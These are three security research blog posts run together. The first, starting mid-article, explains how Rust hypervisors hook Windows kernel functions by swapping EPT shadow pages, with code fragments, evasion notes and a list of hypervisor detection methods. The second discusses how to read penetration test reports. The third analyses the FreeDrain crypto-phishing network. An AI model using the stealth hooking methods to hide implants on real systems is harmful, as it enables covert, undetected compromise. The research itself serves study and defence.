let page_pa = PhysicalAddress::from_va(page_va);

let hook_va = Self::address_in_page(page_va, function_ptr);
let hook_pa = PhysicalAddress::from_va(hook_va);

let inline_hook = FunctionHook::new(function_ptr, hook_va, handler)?;

Step 3, 4, 5 and 6 - Dual-EPT Remapping for Shadow Execution (enable_hooks())

Code Reference (hooks.rs)

After preparing our hooks, we configure the dual-EPT mappings to support shadow execution. For each hooked address, we split the containing 2MB page into 4KB entries in both EPTs. In the primary EPT, we mark the page as READ_WRITE, explicitly removing execute permissions. In the secondary EPT, we mark the same page as EXECUTE only and remap it to our shadow copy containing the inline hook and trampoline logic. This dual-view setup ensures that read and write accesses go through the original mapping in the primary EPT, while instruction fetches trigger execution from our detoured shadow page once we switch to the secondary EPT during an EPT violation later on.

primary_ept.split_2mb_to_4kb(original_page, AccessType::READ_WRITE_EXECUTE)?;
secondary_ept.split_2mb_to_4kb(original_page, AccessType::READ_WRITE_EXECUTE)?;

primary_ept.change_page_flags(original_page, AccessType::READ_WRITE)?;
secondary_ept.change_page_flags(original_page, AccessType::EXECUTE)?;

secondary_ept.remap_page(original_page, hooked_copy_page, AccessType::EXECUTE)?;

Step 7 - Configuring VMCS for Breakpoint VM-Exits (setup_vmcs_control_fields())

During VMCS setup, we configure the EXCEPTION_BITMAP to trap INT3 instructions, ensuring that breakpoint exceptions trigger a VM-exit. Execution starts with the primary_eptp loaded, providing the initial read/write view of guest memory.

Code Reference (vmcs.rs)

vmwrite(vmcs::control::EXCEPTION_BITMAP, 1u64 << (ExceptionInterrupt::Breakpoint as u32));
vmwrite(vmcs::control::EPTP_FULL, shared_data.primary_eptp);

Step 8 - Handling EPT Violations with Dynamic EPTP Switching (handle_ept_violation())

When the guest attempts to execute a page that has been marked non-executable in the primary EPT, we receive a VM-exit due to an EPT violation. In response, we switch to the secondary EPTP, which remaps the same GPA to an EXECUTE-only shadow page containing our detour. This allows the guest to continue executing from the hooked version of the function.

Code Reference (ept.rs)

let guest_physical_address = vmread(vmcs::ro::GUEST_PHYSICAL_ADDR_FULL);
let exit_qualification_value = vmread(vmcs::ro::EXIT_QUALIFICATION);
let ept_violation_qualification = EptViolationExitQualification::from_exit_qualification(exit_qualification_value);

if ept_violation_qualification.readable && ept_violation_qualification.writable && !ept_violation_qualification.executable {
    let secondary_eptp = unsafe { vmx.shared_data.as_mut().secondary_eptp };
    vmwrite(vmcs::control::EPTP_FULL, secondary_eptp);
}

If the guest later accesses the same page with a read or write operation - which is not permitted in the secondary EPT - we detect the violation and switch back to the primary EPTP, restoring full READ_WRITE access for data operations.

if !ept_violation_qualification.readable && !ept_violation_qualification.writable && ept_violation_qualification.executable {
    let primary_eptp = unsafe { vmx.shared_data.as_mut().primary_eptp };
    vmwrite(vmcs::control::EPTP_FULL, primary_eptp);
}

Matrix doesn’t currently handle mixed access patterns like RWX or RX within the same page, unlike Illusion which uses MTF to safely replay displaced instructions.

Step 9 - Redirecting Execution via Breakpoint Handlers (handle_breakpoint_exception())

When the guest executes the INT3 instruction embedded in the shadow page, a VM-exit is triggered due to the breakpoint exception. We resolve the guest’s current RIP and check if it matches any registered hook in our internal manager. If found, we redirect RIP to our hook handler, placing us in full control of execution. From here, we can inspect arguments, log activity, or introspect guest memory before returning to the original function using the preserved trampoline.

Code Reference (exceptions.rs)

if let Some(Some(handler)) = hook_manager.find_hook_by_address(guest_registers.rip).map(|hook| hook.handler_address()) {
    guest_registers.rip = handler;
    vmwrite(vmcs::guest::RIP, guest_registers.rip);
}

Step 10 - Returning via Trampoline to Original Guest Function (mm_is_address_valid() and nt_create_file())

After our hook logic runs, we forward execution back to the original kernel function using a trampoline. The handler retrieves the preserved entry point from an atomic global and safely casts it to the correct signature. This handoff ensures the guest continues as if uninterrupted, maintaining guest illusion.

Code Reference (hook.rs)

let fn_ptr = MM_IS_ADDRESS_VALID_ORIGINAL.load(Ordering::Relaxed);
let fn_ptr = unsafe { mem::transmute::<_, MmIsAddressValidType>(fn_ptr) };
fn_ptr(virtual_address as _)
let fn_ptr = NT_CREATE_FILE_ORIGINAL.load(Ordering::Relaxed);
let fn_ptr = unsafe { mem::transmute::<_, NtCreateFileType>(fn_ptr) };
fn_ptr(...)

Matrix Execution Trace: Proof-of-Concept Walkthrough

This screenshot captures a live EPT violation triggered when the guest executes MmIsAddressValid. The debug output (left) shows that an EXECUTE access on the original guest physical page at 0xfffff801695ad370 caused a VM-exit, as it had been stripped of execute permissions in the primary EPT. We respond by switching to the secondary EPT, where the guest physical address is remapped to a shadow copy located at 0x239d38370.

In the shadow page, we overwrite the function prologue with a single-byte INT3 instruction, causing a breakpoint exception. This results in another VM-exit, where we locate the hook, redirect guest RIP to the handler, and resume execution. After the handler completes, execution is transferred to a trampoline located at 0xffffdb0620809f90, which continues the original function. The trampoline performs this redirection via an indirect jmp qword ptr [0xffffdb0620809f9a], which resolves to 0xffffdb0620809f9a - the address immediately after the overwritten instruction - restoring execution flow.

Matrix Hook Setup and Trampoline Redirection Figure 9: Shadow Page Redirection and Trampoline Setup for MmIsAddressValid

The debug logs confirm that the MmIsAddressValid hook handler was successfully invoked, and its first parameter was printed, demonstrating that the redirection and handler execution worked as intended.

Matrix EPT Violation and Handler Execution Flow Figure 10: EPT Violation Handling and Hook Invocation for MmIsAddressValid

Unlike Illusion, we don’t currently support user-mode communication in Matrix, though adding it would be straightforward. What we demonstrate instead is a complete proof-of-concept for redirecting kernel execution using EPTP swaps, instruction trapping, and memory virtualization - all without modifying guest memory. This enables stealth introspection, syscall monitoring, and control flow redirection from a kernel driver-based hypervisor on Windows. While not hardened for real-world deployment, Matrix lays the foundation for advancing EPT-based evasion techniques, dynamic analysis, and memory protection research.

Hook Redirection Techniques: INT3, VMCALL, and JMP

While the use of INT3-based hooks offers a lightweight and minimally invasive method for redirecting control flow, it introduces two VM-exits per hook: one on the EPT violation and another on the breakpoint exception. This tradeoff, also seen in Illusion (which uses VMCALL), introduces an extra VM-exit during hook execution. An alternative is to use a 14-byte indirect jump, such as jmp qword ptr [rip+0], which performs an absolute jump by reading the target address from memory immediately following the instruction. This avoids the breakpoint entirely and reduces VM-exits to just one - from the EPT violation alone.

Matrix supports this form of JMP hook via a jmp [rip+0] stub, followed by an 8-byte target address. This method avoids clobbering registers (unlike the mov rax, addr; jmp rax sequence) and reduces the likelihood of introducing side effects. The implementation avoids using general-purpose registers by embedding the jump target inline, which simplifies redirection logic and maintains guest register integrity. By default, Matrix uses INT3 hooks for simplicity and reduced shellcode size.

However, the larger shellcode required for either JMP approach means overwriting more of the original function prologue, increasing complexity around instruction alignment and relative addressing. Other instructions like CPUID, VMCALL, or even undefined opcodes can also be used to trap into the hypervisor, offering future directions for configurable or hybrid hook techniques in Matrix or Illusion.

Hypervisor Detection Vectors

While this article focuses on EPT-based function redirection and stealth memory manipulation for memory introspection, it’s important to acknowledge that hypervisor-assisted hooks can be detected from usermode, even without elevated privileges. These detection techniques typically rely on timing discrepancies, fault-triggering behavior, or instruction-level profiling - usually caused by VM exits during memory access or privileged instruction handling.

Although out-of-scope for this post, here’s a non-exhaustive list of some known detection methods:

  • Write-checks to unused code padding (e.g., 0xCC -> 0xC3)
  • RDTSC-based timing checks to detect EPT page swaps
  • Thread-based timing discrepancies across CPU cores
  • CPUID execution profiling (e.g., latency measurement and vendor ID leaks)
  • Instruction Execution Time (IET) divergence using APERF or similar counters
  • Fault injection via invalid XSETBV, MSR, or control register (CR) access
  • Synthetic MSR probing (e.g., reads to the 0x40000000 range)
  • SIDT/SGDT descriptor length checks in WoW64 mode
  • LBR stack mismatches during forced VM exits
  • INVD/WBINVD misuse to test caching consistency
  • VMCALL exception handling behavior (e.g., improper #GP injection)
  • CR0/CR4 shadow mismatch or VMXE bit exposure
  • Unusual exception/NMI delivery paths (e.g., unexpected #PF or #UD behavior)
  • UEFI memory map analysis to reveal hidden hypervisor regions
  • CR3 trashing to disrupt hypervisors that track or isolate memory mappings per process
  • Descriptor table (GDT/IDT) integrity checks to detect hypervisors that fail to isolate or emulate guest-accessible structures correctly
  • Page table consistency checks targeting hypervisors that do not fully separate guest and host memory contexts (e.g., shared CR3 or improper shadow paging)

For detailed explorations of these techniques (and many others), see:

While some of these resources are older, many of the underlying concepts remain valid. The broader topics of evasion, stealth, and hypervisor detection are left as an exercise to the reader.

Appendix

Guest-Assisted Hooking Model

During early development of illusion-rs, a guest-assisted hooking model was implemented and tested. This technique involved allocating memory in the guest, injecting helper code, and redirecting execution (RIP) to a payload from the hypervisor. While technically viable, it introduced additional complexity and detection risk.

Traditional JMP-based inline hooks were avoided because the hypervisor operates outside the guest’s address space in a UEFI context. Implementing them would have required modifying guest memory, resolving APIs manually, coordinating execution context, and managing synchronization across early kernel stages - all of which added exposure and fragility.

This model was similar to the approach explored by Satoshi Tanda, who implemented a GuestAgent in C to hijack control from within the guest during kernel initialization and perform in-guest syscall hooking.

Although functional, this technique complicated recovery and required delicate coordination with guest state. Ultimately, it was removed from illusion-rs in favor of a cleaner design: EPT shadowing combined with inline VMCALL detours and MTF single-stepping for restoration. This approach avoids modifying guest memory entirely by redirecting execution through hypervisor-controlled shadow pages, simplifying control flow and enabling precise redirection without in-guest code.

Comparing EPT Hooking Models: Per-Core vs Shared

The two hypervisors presented in this article - illusion-rs and matrix-rs - implement different EPT-based hooking models, each chosen to explore trade-offs in design, implementation complexity, and control granularity.

Use illusion-rs if you need precise control and fully host-side introspection without relying on in-guest code or memory allocation. It’s also ideal for scenarios requiring early boot-time visibility - such as monitoring or hijacking kernel behavior - before any drivers or security controls are initialized.

Use matrix-rs if you prefer a dynamically loadable Windows kernel driver-based hypervisor with a shared EPT model and no reliance on UEFI or firmware-level integration.

Matrix (Shared EPT Across All Logical Processors)

matrix-rs is a Windows kernel driver-based hypervisor that uses a single EPT shared across all logical processors. This design was inspired by not-matthias’s AMD hypervisor, and development began in late 2022 as a learning project. The shared EPT model made implementation simpler - EPT violations can trigger EPTP switching, and hook state is globally consistent.

Pros:

  • Fewer EPT contexts to manage (single EPTP per system)
  • Simpler hook setup - updates apply globally
  • Only one INVEPT needed per hook change (such as adding or removing a hook)

Cons:

  • Race conditions can occur across processors
  • Harder to manage per-core or dynamic hook states
  • Less precise control over per-CPU redirection

While both models require EPT cache invalidation during hook changes (such as adding or removing a hook), INVEPT must be issued on each logical processor because TLBs are per-logical processor. This applies whether the hypervisor uses per-core EPTs like illusion-rs or a shared EPT like matrix-rs.

Illusion (Per-Logical-Processor EPTs with MTF)

illusion-rs is a UEFI-based hypervisor that uses a separate EPT for each logical processor. Development began in late 2023 to explore a boot-time introspection model using Monitor Trap Flag (MTF) stepping for displaced instruction replay. This approach avoids allocating memory or injecting trampoline code into the guest entirely - everything remains under hypervisor control.

Pros:

  • Hook logic remains fully on the host - no in-guest code needed
  • Enables clean replay of overwritten instructions via MTF
  • Fine-grained redirection per logical processor

Cons:

  • Hook updates must be replicated to all EPT contexts
  • Requires issuing INVEPT on each logical processor on every hook change (such as adding or removing a hook)
  • Increased complexity from maintaining consistent hook state across processors
  • MTF stepping incurs additional VM-exits per instruction replay, which may introduce performance overhead depending on the number of overwritten instructions, hook frequency, and placement

Unlike traditional hook models that resume immediately after a detour, the MTF-based approach introduces one VM-exit per replayed instruction. This may be negligible for single hooks but becomes measurable if hooking frequently-executed code paths or system-wide targets.

There are many additional trade-offs - such as design constraints, integration complexity, and guest compatibility - that are beyond the scope of this article and left as an exercise for the reader.

While illusion-rs introduces a cleaner memory manager with pre-allocated page tables and shadow pages, both hypervisors remain proof-of-concept designs. Each offers a foundation for low-level memory introspection and control flow redirection, and can serve as a starting point for deeper research or production-quality development.

For most dynamic or runtime hooking scenarios, the shared EPT model in matrix-rs may be easier to integrate. For firmware-level introspection and early boot control, illusion-rs offers tighter control over execution at the cost of added complexity.

Conclusion

This post covered how to build Rust-based hypervisors for stealth kernel introspection and function hooking using Extended Page Tables (EPT). We explored two proof-of-concept implementations: illusion-rs, a UEFI-based hypervisor that hooks syscalls during early boot, and matrix-rs, a Windows kernel driver-based hypervisor that uses dual-EPT context switching to redirect execution at runtime.

We demonstrated how to detect when the SSDT is fully initialized inside ntoskrnl.exe, how to install execute-only shadow pages, and how to safely redirect execution using VMCALL, CPUID, or INT3 without modifying guest memory. In Illusion, we relied on Monitor Trap Flag (MTF) single-stepping to replay displaced instructions, while Matrix used breakpoint exceptions and trampoline logic to forward control.

Both approaches preserve guest memory integrity and operate without triggering PatchGuard by relying on EPT-backed remapping instead of patching the kernel directly. The result is syscall hooking with fine-grained execution control, suitable for implants, introspection, or security research.

The examples shown here are not groundbreaking - they’re simply a reproducible starting point. Once control is established, these techniques can be extended to conceal threads, processes, handles, memory regions, or embed payloads like shellcode or reflective DLLs - all without modifying guest memory. However, Virtualization-Based Security (VBS) makes custom hypervisor-based hooking significantly harder - from preventing third-party hypervisors from loading at all, to disrupting EPT-based redirection techniques. Defenses like Intel VT-rp, nested virtualization barriers, and integrity enforcement make it difficult to establish control below or alongside Hyper-V - unless you’re prepared to pivot into hyperjacking Hyper-V at boot-time or run your own hypervisor on top of Hyper-V via nested virtualization. Still, building your own hypervisor offers greater control, flexibility, and understanding - and it’s often where the truly novel work begins.

Everything demonstrated was implemented using publicly documented techniques - no NDAs, no private SDKs, and no reliance on undocumented internals. These techniques have long been used in the game hacking scene and are increasingly adopted in security research and commercial products. However, practical guides and open-source implementations remain relatively uncommon, especially for early boot-time hypervisors.

Both illusion-rs and matrix-rs are open-source and available for experimentation. For those looking to explore more minimal or educational examples, barevisor by Satoshi Tanda provides a clean starting point for hypervisor development across Intel and AMD platforms - for both Windows kernel driver-based and UEFI-based hypervisors.

However, if you’re looking for a pre-built, modular, and extensible library for Virtual Machine Introspection, check out the recent project vmi-rs by Petr Beneš (@wbenny).

Acknowledgments, References, and Inspirations

Articles, Tools, and Research References

Community Research and Inspirations

Acknowledgments

Documentation and Specifications

Misinterpreted: What Penetration Test Reports Actually Mean

“I can’t show this to my customers! I need a clean report!”

At Include Security, we put a lot of care into our penetration test reports. But over the years, we’ve noticed that our reports are sometimes interpreted in ways we did not intend. This is understandable. Different people, with different backgrounds, goals, and incentives, will naturally read the same document differently. That is the nature of communication. Still, we think it is worth clarifying some of our intentions and addressing some common misinterpretations. In this post, we’ll walk through the most common misconceptions we encounter and explain our perspectives as an expert pentesting team.

Who Our Reports Are For

As we acknowledged above, interpretations of a report will depend on the reader. When we deliver a report, we have four primary audiences in mind:

Our client. First and foremost, we are hired to help improve the security of a client’s technology. The report documents what we tested, what we found, and what we understand about the security posture of the system. The goal is to help our client make informed decisions about the security of their systems and applications.

Our client’s customers. Many organizations purchasing products and services require evidence of third-party security assessments from their vendors. We take that responsibility of independent review seriously. When a customer reviews one of our reports, we want them to know that it was written with integrity and technical rigor.

Auditors. Although we are not ourselves auditors, our penetration test reports are often used during compliance reviews or audits to demonstrate that testing has been performed. In these cases, our reports must clearly describe the scope, methodology, findings, and remediation status. Auditors must determine from this content whether compliance requirements have been met.

Ourselves. Many clients conduct periodic assessments of the same systems. While we take extensive internal notes, past reports are a key input to future assessments. They serve as part of our institutional memory, so they need to be thorough, accurate, and clear.

After considering many report readout meetings, and post-delivery conversations with our clients, we’ve identified three misinterpretations requiring the most additional communication to find alignment on.

Misinterpretation #1: Vulnerabilities are a sign of failure

On many occasions, we’ve received alarmed responses from clients about findings in the report. The clients expressed a concern like “I need to show this report to my customers, and if they see we have any vulnerabilities, they won’t want to do business with us.” We completely understand why a customer would want to avoid purchasing software with a poor record of security. However, the information in the report needs to be considered in the proper context. It is a snapshot in time. Vulnerabilities may have been recently added to the test environment during the latest feature development, and they may be resolved before being exposed to the world. 

We have tested code from startups as well as established tech giants. We’ve examined code built with a wide range of programming languages and frameworks. Nobody is writing code that does anything interesting without occasionally introducing some security vulnerabilities. 

The presence of vulnerabilities in a penetration test report does not necessarily represent any deficiency of the developers nor their software development process. Just as great writers benefit from editors, great engineers benefit from outside testers. A report with findings does not mean the team failed. It means security experts looked closely and found areas that could be improved. 

By the time you’re reading this, this blog post will have been through several revisions and incorporated feedback from multiple readers/editors. It is considerably less complex than most software projects, and yet it still didn’t get everything right in the initial draft (and probably still didn’t in this published version either!).

Misinterpretation #2: A “clean” report is always good news

Some application tests result in a report with few or no vulnerabilities identified because the applications have been hardened over time and the core code has been subjected to repeated testing. With limited code changes between tests, the number and severity of vulnerabilities declines. This is great.

However, many application tests reveal few findings for less comforting reasons:

  • The scope was very narrow. The whole system might have interesting functionality and potential risks, but the boundaries of the test did not permit all of it to be examined.
  • The time allotted was insufficient for complete coverage. Perhaps the budget only provided one week’s worth of testing for a very large application. Some testing is better than no testing, but without enough time to cover everything, assurance is reduced.
  • There were limitations in the test environment, such as: features weren’t fully functional, test data was absent, request rate limiting was enforced, databases were refreshed during testing, new code was deployed during testing, or test accounts weren’t available for all roles.
  • Only dynamic testing was performed (i.e. Blackbox); source code was not provided.
  • The skills of the assessment team were lacking. IncludeSec has an all-expert team, but that’s not true everywhere.

Misinterpretation #3: It is necessary for every finding to be fixed.

A finding in the report is not a demand for remediation. Penetration testing identifies technical risks. Whether or not to remediate those risks is a business decision. Penetration testers do not know the client’s budget, roadmap, risk tolerance, or the business value of each application or function. It is completely reasonable for a business to accept some risks and elect to not remediate certain vulnerabilities. That decision does not invalidate the finding, and it does not mean the finding is a false positive. It simply reflects that the cost to fix a vulnerability can be greater than the business benefit of remediation. In this case, we encourage our clients to document their reasoning for risk acceptance. We include their explanation in our remediation report so that interested parties can understand the full context.

What Is Better Than a “Clean” Report?

We understand the appeal of a report with no findings. It feels like a win. But we believe there are better indicators of a strong security posture:

Regular testing. One report is just a snapshot. Security is an ongoing process. Integrate secure development practices, code reviews, and internal QA into your software development lifecycle. Bring in third-party testers regularly to catch what might be missed internally.

Good remediation reports. The contents of the initial report are only half the story. Confirmation that the identified vulnerabilities have been fixed is evidence that a client’s assurance process is achieving its aim of improving the application’s security.

Reports without caveats. A zero-finding report from a short, constrained, black-box test tells you less than a thorough test that uncovered real vulnerabilities and explained them clearly.

Reports from skilled, reputable testers. Testing is only as good as the people doing it. A short report might reflect a secure system, or it might reflect weak testing. A strong report demonstrates expertise by explaining how the system works and why certain classes of vulnerabilities were or were not present.

Final Thoughts

Penetration test reports are tools for improving security. When read in the right context, even reports full of findings can be signs of a mature, proactive development culture. The goal isn’t a perfect report, it’s a stronger, more resilient system.

The post Misinterpreted: What Penetration Test Reports Actually Mean appeared first on Include Security Research Blog.

FreeDrain Unmasked | Uncovering an Industrial-Scale Crypto Theft Network

Executive Summary

  • FreeDrain is an industrial-scale, global cryptocurrency phishing operation that has been stealing digital assets for years.
  • FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets.
  • Victims search for wallet-related queries, click on high-ranking malicious results, land on lure pages, and are redirected to phishing pages that steal their seed phrases.
  • SentinelLABS and Validin researchers identified over 38,000 distinct FreeDrain subdomains hosting lure pages.
  • Phishing pages are hosted on cloud infrastructure like Amazon S3 and Azure Web Apps, mimicking legitimate cryptocurrency wallet interfaces.
  • Evidence suggests the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours.
  • FreeDrain represents a modern, scalable phishing operation that exploits weaknesses in free publishing platforms and requires better platform-level defenses, user education, and security community collaboration.

Unveiled today at PIVOTcon, this joint research from Validin, the global internet intelligence platform, and SentinelLABS, the threat intelligence and research team of SentinelOne, exposes the FreeDrain Network: a sprawling, industrial-scale cryptocurrency phishing operation that has quietly siphoned digital assets for years. What began as an investigation into a single phishing page quickly uncovered a vast, coordinated campaign weaponizing search engine optimization, free-tier web services, and layered redirection techniques to systematically target and drain cryptocurrency wallets at scale.

In this collaborative blog, we detail the technical anatomy of the FreeDrain operation from the discovery process and infrastructure mapping to evasion techniques and the end-to-end workflow attackers use to funnel victims through multilayered financial theft paths. We also walk through the custom tooling we built to hunt, track, and monitor this large campaign in real time.

Our findings highlight the growing sophistication of financially motivated threat actors and the systemic risks posed by under-moderated publishing platforms. This research underscores the need for adaptive detection, proactive monitoring, and tighter safeguards across the ecosystem to disrupt threats like FreeDrain before they scale.

The Plea for Help

Our investigation into what would become the FreeDrain Network began on May 12, 2024, when Validin received a message from a distressed individual who had lost approximately 8 BTC, worth around $500,000 at the time. The victim had unknowingly submitted their wallet seed phrase to a phishing site while attempting to check their wallet balance, after clicking on a highly-ranked search engine result.

Request for help after successful phish
Request for help after successful phish

The individual had come across a Validin blog post from April 2024, which documented a series of crypto-draining phishing pages. The phishing site they encountered shared striking similarities to the infrastructure we had analyzed—specifically, pages hosted on azurewebsites[.]net, along with additional dedicated domain names.

Trusted cryptocurrency tracking analysts confirmed that the destination wallet used to receive the victim’s funds was a one-time-use address. The stolen assets were quickly moved through a cryptocurrency mixer, an obfuscation method that fragments and launders funds across multiple transactions, making attribution and recovery nearly impossible.

While we weren’t able to assist in recovering the lost assets, this outreach marked a turning point. It became clear that the incident was not isolated. We set out to uncover the infrastructure behind the scam and understand the broader operation enabling these thefts to occur at scale.

Cracking the Surface – Our First Look at FreeDrain

When Valdin published the initial findings in April 2024, one key piece of the puzzle remained unclear: how were these phishing pages reaching victims at scale? While common delivery methods like phishing emails, SMS (smishing), social media posts, and blog comment spam are frequently used in cryptocurrency scams, none appeared to be the source in this case.

That changed with the report from the victim in May. They had encountered the phishing site via a top-ranked search engine result, not a suspicious message or unsolicited link.

Curious whether we could reproduce the victim’s experience, we conducted a series of keyword searches ourselves. The results were startling.

Search terms like “Trezor wallet balance” returned multiple malicious results across Google, Bing, and DuckDuckGo, often within the first few result pages.

Trezor Wallet Balance malicious result in DuckDuckGo
Trezor Wallet Balance malicious result in DuckDuckGo

Trezor Wallet Balance malicious result in top Bing Search
Trezor Wallet Balance malicious result in top Bing Search

Trezor Wallet Balance malicious result in Top Google Search result
Trezor Wallet Balance malicious result in Top Google Search result

These were not obscure or poorly maintained phishing sites; they were professionally crafted lure pages freely hosted on subdomains of trusted platforms like gitbook.io, webflow.io, and github.io.

This discovery marked our first real glimpse into the scale and sophistication of the FreeDrain campaign—and raised a host of new questions. Specifically, what is the overall workflow once a victim visits the site, how are these pages becoming so highly ranked, and what can we discover about the attackers themselves?

Workflow – A Victim’s Path to Compromise

To understand how victims were being funneled into this operation and the post-visit workflow, we checked out the top-ranked search results that we knew weren’t connected to authoritative, legitimate websites, looking for malicious behavior. Within minutes, we encountered related live phishing pages, and quickly began piecing together the end-to-end workflow that a typical victim might experience.

The attack chain was deceptively simple:

  1. Search for wallet-related queries (e.g., “Trezor wallet balance”) on a major search engine.
  2. Click a high-ranking result, often hosted on a seemingly trustworthy platform like gitbook.io or webflow.io.
  3. Land on a page displaying a large, clickable image, a static screenshot of the legitimate wallet interface.
  4. Click the image, which either:
    • Redirects the user to legitimate websites.
    • Redirects the user through one or more intermediary sites
    • Directly leads to a phishing page.
  5. Arrive at the final phishing site, a near-perfect clone of the real wallet service, prompting the user to input their seed phrase.
Attack chain summary
Attack chain summary

The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy. And once a seed phrase is submitted, the attacker’s automated infrastructure will drain funds within minutes.

Lure page linking to phishing page
Lure page linking to phishing page

Redirect to legitimate site
Redirect to legitimate site

Lure Page Ranking – Weaponizing SEO

We were stunned by the sheer volume of lure pages appearing among top-ranked search results across all major search engines. These weren’t complex, multi-layered scams. In most cases, the pages consisted of just a single large image (again, usually a screenshot of a legitimate crypto wallet interface) followed by a few lines of text that offered seemingly helpful instructions, ironically, some even claimed to educate users on how to avoid phishing.

This type of simplistic, Q&A-style content is well-known in SEO circles for being rewarded by search engine algorithms. Because users often turn to search engines for direct answers, pages that appear to offer guidance, even when malicious, can be algorithmically elevated in rankings, especially when hosted on high-reputation platforms.

In our early investigation (May–June 2024), we found that many of these lure pages were hosted on services like webflow.io and gitbook.io. Both platforms provide low-friction publishing, enabling anyone to spin up a custom subdomain and publish arbitrary content for free. The subdomains used followed familiar spammer patterns, frequent use of hyphens, deliberate misspellings, and keyword stuffing to manufacture variation and dodge blacklisting.

Subdomain naming scheme similarities
Subdomain naming scheme similarities

Generative AI as a Tool for Scale

The text on many lure pages bore clear signs of having been generated by large language models. We found copy-paste artifacts that revealed the specific tools used, most notably, strings like “4o mini”, a likely reference to OpenAI’s GPT-4o mini model. These telltale traces suggest that FreeDrain operators are leveraging generative AI not only to create scalable content but doing so carelessly at times.

Fake content mistakenly including OpenAI GPT-4o mini reference
Fake content mistakenly including OpenAI GPT-4o mini reference

FreeDrain’s Secret Weapon – Spamdexing

But content alone doesn’t explain how these pages were getting indexed and ranked above legitimate sources. How were search engines even discovering them?

The answer came when we identified several indexed URLs pointing back to high-ranking lure pages, and traced them to massive comment spam campaigns. FreeDrain operators appear to be heavily abusing neglected web properties that allow open or weakly-moderated comments, flooding them with links pointing to their lure pages. This old tactic, known as spamdexing, is a well-documented SEO abuse technique, which FreeDrain makes heavy use of as one of the ways to attempt to game SEO.

In one striking example, we found a Korean university photo album page with a single image uploaded over a decade ago, buried under 26,000 comments, nearly all of them containing spam links.

FreeDrain uses large-scale comment spam on poorly-maintained websites to boost the visibility of their lure pages via search engine indexing
FreeDrain uses large-scale comment spam on poorly-maintained websites to boost the visibility of their lure pages via search engine indexing

This technique allows FreeDrain to sidestep traditional delivery vectors like phishing emails or malicious ads, instead meeting victims exactly where they’re looking, at the top of trusted search engines.

Tracking Search Results

Understanding how FreeDrain’s lure pages consistently climbed to the top of search results became a key investigative goal, and it demanded custom tooling.

We built a purpose-specific crawler designed solely to emulate search engine queries, navigate through pages of search results, and extract structured data from each result: URLs, page titles, and text content summaries. The goal was to systematically monitor how malicious pages were ranking, shifting, and proliferating over time.

We ran this system daily across 700 unique keyword permutations, capturing up to 40 pages deep per search query, per search engine. This daily monitoring provided a dynamic, longitudinal view into the visibility of FreeDrain’s infrastructure.

The Scale of Abuse

After four months of collection, we amassed a dataset of more than 200,000 unique URLs, drawn from topical search results across at least a dozen different publishing platforms that allow users to create custom subdomains. Aggressively filtering, we identified over 38,000 distinct FreeDrain subdomains hosting the lure pages.

These subdomains appeared on well-known free hosting and publishing platforms, including:

  • Gitbook (gitbook.io)
  • Webflow (webflow.io)
  • Teachable (teachable.com)
  • Github.io
  • Strikingly (mystrikingly.com)
  • WordPress.com
  • Weebly.com
  • GoDaddySites (godaddysites.com)
  • Educator Pages (educatorpages.com)
  • Webador (webador.com)
Breakdown of total domains to suspected URLs, to Confirmed URLs by quantity
Breakdown of total domains to suspected URLs, to Confirmed URLs by quantity

The volume and spread across legitimate platforms further highlights how FreeDrain relies on the low-friction, high-trust nature of these services to evade detection and amplify reach.

To go beyond static discovery, we implemented scheduled re-crawls of every suspected lure page. This allowed us to track:

  • Content updates over time
  • Changes in redirect behavior
  • New final-stage phishing URLs being introduced
  • Takedowns and domain churn

This gave us a clearer picture of FreeDrain’s infrastructure lifecycle, from initial lure page creation to eventual takedown or abandonment, which helped us understand the rotation strategies used to keep malicious links live and searchable.

Lure Page Breakdown

Despite being spread across a wide array of publishing platforms, FreeDrain lure pages followed a remarkably consistent structure, carefully optimized to appear helpful and legitimate, while subtly guiding victims toward compromise.

Common Elements Observed Across Lure Pages

Across gitbook.io, webflow.io, github.io, and others, the pages typically included:

  • A single, large, clickable image occupying most of the viewport
    • This image was a screenshot of a legitimate cryptocurrency site (e.g., Trezor, Metamask, or Ledger)
    • The image linked externally, usually to a malicious redirection chain
  • AI-generated help content positioned below the image
    • The text answered common user queries like “How do I check my wallet balance on Trezor?”
  • 1–2 additional embedded links, which pointed to the same external destination as the image or were placeholders like "#"

Link Behavior: Redirection Variability

Clicking the image or associated links triggered unpredictable outcomes, depending on the time, user agent, or page freshness:

  • Redirection through one or more intermediary domains (typically 1–5 hops)
  • Final destinations varied widely:
    • A phishing page built to capture wallet seed phrases (hosted on Azure or AWS S3)
    • A legitimate site like trezor.io or metamask.io, creating false reassurance
    • A non-functional domain (404 or NXDOMAIN)
    • The current page itself ("#") acting as a placeholder when infrastructure wasn’t active

This redirection behavior made classification challenging, especially since not every page led directly to a phishing endpoint in every instance.We observed that lure pages initially hosted benign content before being modified to include malicious redirects usually weeks or months later. This aging tactic likely helped the sites build trust and survive longer before being flagged or removed.

A Github lure page that has just been changed from benign to malicious
A Github lure page that has just been changed from benign to malicious

Obfuscation Through Variation

Identifying FreeDrain lure pages at scale proved difficult due to extreme variation in phrasing, metadata, and platform-specific formatting. For example, we identified 46 unique renderings of the word “Trezor”, all visually similar, using tricks like added Unicode characters, zero-width spaces, and mixed script alphabets.

Trezor variation heatmap by quantity
Trezor variation heatmap by quantity

Demonstrating the variations in tooling use, we found that FreeDrain pages on github\.io were usually copies of the generated content from services like Mobrise Website Builder and Webflow.


Snippets of pages hosted on github\.io with content clearly generated using other tools, for example, “Mobrise Website Builder”
Snippets of pages hosted on github\.io with content clearly generated using other tools, for example, “Mobrise Website Builder”

A turning point in connecting these fragmented domains came from pivoting off the redirection infrastructure. While the lure content varied, the redirectors often remained consistent across pages and platforms.

Validin result showing redirector abusing free services
Validin result showing redirector abusing free services

By tracing traffic from anchor links to known FreeDrain redirectors, we were able to map common ownership and activity across otherwise-unrelated services. This infrastructure-based pivot became essential for clustering and attribution, bridging gaps that the lure content itself couldn’t.

Redirectors

Pivoting on URLs from known and suspected FreeDrain lure pages that we were monitoring, we quickly noticed some noteworthy patterns in the FreeDrain redirection domains.

Domain Characteristics

Nearly all redirector domains shared several features:

  • .com TLDs exclusively
  • Names that appeared algorithmically generated, likely via a Domain Generation Algorithm (DGA) or Markov chain model
  • English-adjacent structure, visually familiar but never forming real English words

Examples include:

  • antressmirestos[.]com
  • shotheatsgnovel[.]com
